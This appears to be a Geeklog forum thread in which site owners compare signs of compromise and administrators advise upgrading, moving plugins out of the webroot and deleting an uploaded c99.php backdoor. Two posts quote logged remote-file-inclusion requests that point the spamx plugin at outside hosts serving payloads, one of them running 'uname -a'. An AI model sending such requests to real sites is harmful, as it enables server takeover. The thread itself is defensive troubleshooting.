Welcome to Geeklog, Anonymous Thursday, March 28 2024 @ 06:40 pm EDT

Geeklog Forums

A way to tell if you've been hacked?


Status: offline

JohnG7

Forum User
Newbie
Registered: 09/29/06
Posts: 3
Location:Montana
confused
HI All, I don't suppose anyone knows of a way to tell if a geeklog install has been hacked? Seems like someone keeps trying to hack through an IP from Mexico: /geeklog/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://myfox.altervista.org/tool25.dat?&cmd=uname%20-a HTTP/1.1 Thanks in advance for any feedback. Best, john
Looking for cool stuff - www.cubicleamusements.com
 Quote

Status: offline

jmucchiello

Forum User
Full Member
Registered: 08/29/05
Posts: 985
That's an old vulnerability. And a slim vulnerability at that. You had to run all of geeklog inside the webroot and had to have register_globals on. If you are using the latest GL, you are fine. Just block the IP if they are being annoying.
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
I'm actually seeing a lot of those on all my sites at the moment. If you don't have your plugin directory in the webroot, i.e. if you followed our installation instructions, you're save from those anyway.

If you do have the plugins directory in your webroot, e.g. because you used Fantastico to install Geeklog, make sure you're running on the latest version. You could also password-protect those directories to be sure.

bye, Dirk
 Quote

Status: offline

andyofne

Forum User
Chatty
Registered: 08/31/02
Posts: 69
Quote by: jmucchiello

That's an old vulnerability. And a slim vulnerability at that. You had to run all of geeklog inside the webroot and had to have register_globals on. If you are using the latest GL, you are fine. Just block the IP if they are being annoying.



And yet it actually worked on my site because I choose to be crafty with my installation method and I didn't follow the instructions very well.

 Quote

Status: offline

HerreVermeer

Forum User
Newbie
Registered: 03/08/06
Posts: 6
Location:Netherlands
Quote by: Dirk

I'm actually seeing a lot of those on all my sites at the moment. If you don't have your plugin directory in the webroot, i.e. if you followed our installation instructions, you're save from those anyway.

If you do have the plugins directory in your webroot, e.g. because you used Fantastico to install Geeklog, make sure you're running on the latest version. You could also password-protect those directories to be sure.



I suppose by following the exact directions you mean:

Root
|-my website.host.com
| |-Admin
| | |-Plugins
| |
| |-Plugins
|
|-Geeklog
|-Plugins

I've been having problems too lately, my site was hacked (they replaced my index.php page which was now displaying a message by whoever hacked me) twice in the last three days, by two different hackers from as it seems totally different countries. I haven't changed the code since the latest version (1.4.0) of geeklog was released, and I haven't installed any new plugins too lately.

I was running an old versionn of media gallery however (1.4.7) but upgraded to 1.5.0 today. Other than that I was running two other old plugins: filemgmt and chatterblog, which I have now completely deleted and uninstalled.

Other than having my index.php page replaced I found a file called c99.php, on two different locations somewhere in my public html folder, and my bad_behavior log is also showing some of the logs that John is Talking about:

"Reason: User-Agent beginning with 'libwww-perl' prohibited

GET /links/index.php?category=Geeklog/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=http://kampsite.com/test4? HTTP/1.0" and much more of these

Is there any security leak that's been going on, or am I not protecting my files right (I have set it up as said in the geeklog installation, but not for any of the plugins)? Other than a little more than basic geeklog installations and handlings I'm also still nothing more than a newbee. Is there any way to better protect hackers from undermining my website's security (from potential hackers than like to destroy more than just my index page?)

Thanks a lot,

Herre
Herre Vermeer
http://fotograaf.freestarthost.com
 Quote

Status: offline

HerreVermeer

Forum User
Newbie
Registered: 03/08/06
Posts: 6
Location:Netherlands
Note that the last directory--plugins-- is actually under the geeklog directory. The spaces got deleted when I posted
Herre Vermeer
http://fotograaf.freestarthost.com
 Quote

Status: offline

jmucchiello

Forum User
Full Member
Registered: 08/29/05
Posts: 985
I found a file called c99.php

Delete it. It's a known backdoor. Google it and you will find just about every php project on the web has users asking what c99.php is.
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Quote by: HerreVermeer

[I haven't changed the code since the latest version (1.4.0) of geeklog was released, and I haven't installed any new plugins too lately.[/p]


You should be running 1.4.0sr5-1, if you're still on a 1.4.0 version. In 1.4.0sr4, we had to remove the FCKeditor's file manager due to a security issue that let people upload files. Make sure you've really removed it.


Other than having my index.php page replaced I found a file called c99.php

That's probably a PHP shell they managed to upload.

As I already said above, the log entries are nothing to worry about if you've secured your installation.

bye, Dirk
 Quote

Status: offline

HerreVermeer

Forum User
Newbie
Registered: 03/08/06
Posts: 6
Location:Netherlands
My bad, I've been running geeklog version 1.4.1 for a while instead of 1.4.0 like I posted before. Oops!

About the c99.php file, I already got rid of them.

After the first time I got hacked I just found the first one. I didn't realize that there was a second one until I got hacked again, two days later.

I don't know for how long those files have been on my website, it might be that they have been there for a while. More important, this time I made sure that there are no more versions of the c99.php file present on my website. I haven't been hacked today... so my hopes are up.
Herre Vermeer
http://fotograaf.freestarthost.com
 Quote

All times are EDT. The time is now 06:40 pm.

  • Normal Topic
  • Sticky Topic
  • Locked Topic
  • New Post
  • Sticky Topic W/ New Post
  • Locked Topic W/ New Post
  •  View Anonymous Posts
  •  Able to post
  •  Filtered HTML Allowed
  •  Censored Content